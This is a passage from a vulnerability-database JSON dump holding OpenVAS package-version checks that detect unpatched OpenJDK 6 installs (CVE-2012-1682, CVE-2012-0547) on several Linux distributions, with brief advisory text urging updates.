isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:20:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1553-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:841129", "href": "http://plugins.openvas.org/nasl.php?oid=841129", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-1553-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1553_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for openjdk-6 USN-1553-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the Beans component in OpenJDK 6 did not\n properly prevent access to restricted classes. A remote attacker could\n use this to create an untrusted Java applet or application that would\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n It was discovered that functionality in the AWT component in OpenJDK 6\n made it easier for a remote attacker, in conjunction with other\n vulnerabilities, to bypass Java sandbox restrictions. (CVE-2012-0547)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1553-1\";\ntag_affected = \"openjdk-6 on Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1553-1/\");\n script_id(841129);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:39:18 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-1682\", \"CVE-2012-0547\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1553-1\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1553-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:1361412562310870820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870820", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-September/msg00000.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870820\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:35:16 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:1221-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.6.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"java-1.6.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n It was discovered that the Beans component in OpenJDK did not perform\n permission checks properly. An untrusted Java application or applet could\n use this flaw to use classes from restricted packages, allowing it to\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n A hardening fix was applied to the AWT component in OpenJDK, removing\n functionality from the restricted SunToolkit class that was used in\n combination with other flaws to bypass Java sandbox restrictions.\n (CVE-2012-0547)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-06T13:07:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Check for the Version of java-1_6_0-openjdk", "modified": "2018-01-05T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:850325", "href": "http://plugins.openvas.org/nasl.php?oid=850325", "type": "openvas", "title": "SuSE Update for java-1_6_0-openjdk openSUSE-SU-2012:1175-1 (java-1_6_0-openjdk)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_1175_1.nasl 8295 2018-01-05 06:29:18Z teissa $\n#\n# SuSE Update for java-1_6_0-openjdk openSUSE-SU-2012:1175-1 (java-1_6_0-openjdk)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The icedtea-web Java plugin was updated to 1.11.4 to fix\n critical security issues:\n\n * Security fixes\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n * OpenJDK\n - S7182135: Impossible to use some editors directly\n - S7185678:\n java/awt/Menu/NullMenuLabelTest/NullMenuLabelTest.java\n failed with NPE\";\n\ntag_affected = \"java-1_6_0-openjdk on openSUSE 12.1, openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850325);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:33 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:1175_1\");\n script_name(\"SuSE Update for java-1_6_0-openjdk openSUSE-SU-2012:1175-1 (java-1_6_0-openjdk)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1_6_0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debuginfo\", rpm:\"java-1_6_0-openjdk-debuginfo~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debugsource\", rpm:\"java-1_6_0-openjdk-debugsource~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo-debuginfo\", rpm:\"java-1_6_0-openjdk-demo-debuginfo~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel-debuginfo\", rpm:\"java-1_6_0-openjdk-devel-debuginfo~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.6.0.0_b24.1.11.4~0.17.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debuginfo\", rpm:\"java-1_6_0-openjdk-debuginfo~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debugsource\", rpm:\"java-1_6_0-openjdk-debugsource~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo-debuginfo\", rpm:\"java-1_6_0-openjdk-demo-debuginfo~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel-debuginfo\", rpm:\"java-1_6_0-openjdk-devel-debuginfo~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.6.0.0_b24.1.11.4~12.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Check for the Version of java-1.6.0-openjdk", "modified": "2017-12-29T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:870821", "href": "http://plugins.openvas.org/nasl.php?oid=870821", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n It was discovered that the Beans component in OpenJDK did not perform\n permission checks properly. An untrusted Java application or applet could\n use this flaw to use classes from restricted packages, allowing it to\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n A hardening fix was applied to the AWT component in OpenJDK, removing\n functionality from the restricted SunToolkit class that was used in\n combination with other flaws to bypass Java sandbox restrictions.\n (CVE-2012-0547)\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.10.9. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-September/msg00001.html\");\n script_id(870821);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:35:22 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:1222-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:07:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Check for the Version of java", "modified": "2018-01-05T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:881483", "href": "http://plugins.openvas.org/nasl.php?oid=881483", "type": "openvas", "title": "CentOS Update for java CESA-2012:1222 centos5 ", "sourceData": "###############################################################################\n# OpenVAS 